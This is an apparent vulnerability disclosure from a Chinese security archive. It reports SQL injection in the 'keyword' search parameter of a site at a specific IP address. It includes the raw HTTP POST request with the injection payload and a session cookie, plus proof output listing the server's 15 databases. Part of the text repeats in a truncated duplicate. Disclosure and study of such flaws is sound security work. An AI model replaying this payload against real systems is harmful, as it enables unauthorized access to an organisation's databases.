VULHUB ™

### 简要描述： 。。。。。。。 ### 详细说明： 漏洞网站：http://211.151.164.209/ [<img src="https://images.seebug.org/upload/201312/15201418664a5b93224a6655f2a0a65db94c0b9f.jpg" alt="j1.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201312/15201418664a5b93224a6655f2a0a65db94c0b9f.jpg) post信息 ``` POST /search/result.html HTTP/1.1 Content-Length: 68 Content-Type: application/x-www-form-urlencoded X-Requested-With: XMLHttpRequest Referer: http://211.151.164.209:80/ Cookie: JSESSIONID=1CF29CEB6B2C4504B942265891E7A3AF Host: 211.151.164.209 Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36 Accept: */* keyword=nwDdUAXB');*&search_go=GO ``` keyword存在注入 [<img src="https://images.seebug.org/upload/201312/15201616b0e2034cc90a8d53a0a80786172302ea.jpg" alt="j2.jpg" width="600"...

### 简要描述： 。。。。。。。 ### 详细说明： 漏洞网站：http://211.151.164.209/ [<img src="https://images.seebug.org/upload/201312/15201418664a5b93224a6655f2a0a65db94c0b9f.jpg" alt="j1.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201312/15201418664a5b93224a6655f2a0a65db94c0b9f.jpg) post信息 ``` POST /search/result.html HTTP/1.1 Content-Length: 68 Content-Type: application/x-www-form-urlencoded X-Requested-With: XMLHttpRequest Referer: http://211.151.164.209:80/ Cookie: JSESSIONID=1CF29CEB6B2C4504B942265891E7A3AF Host: 211.151.164.209 Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36 Accept: */* keyword=nwDdUAXB');*&search_go=GO ``` keyword存在注入 [<img src="https://images.seebug.org/upload/201312/15201616b0e2034cc90a8d53a0a80786172302ea.jpg" alt="j2.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201312/15201616b0e2034cc90a8d53a0a80786172302ea.jpg) [<img src="https://images.seebug.org/upload/201312/152046388463035379bd94ad39f057ba7f5ee0af.jpg" alt="j3.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201312/152046388463035379bd94ad39f057ba7f5ee0af.jpg) ### 漏洞证明： ``` available databases [15]: [*] career [*] certificate_center [*] CRC [*] DLCenter [*] kdweb [*] kingdee [*] kingdeeglobal [*] kingdeeMalaysia [*] kingdeeSingapore [*] master [*] model [*] msdb [*] orgkingdee [*] orgKingdeeTest [*] tempdb ```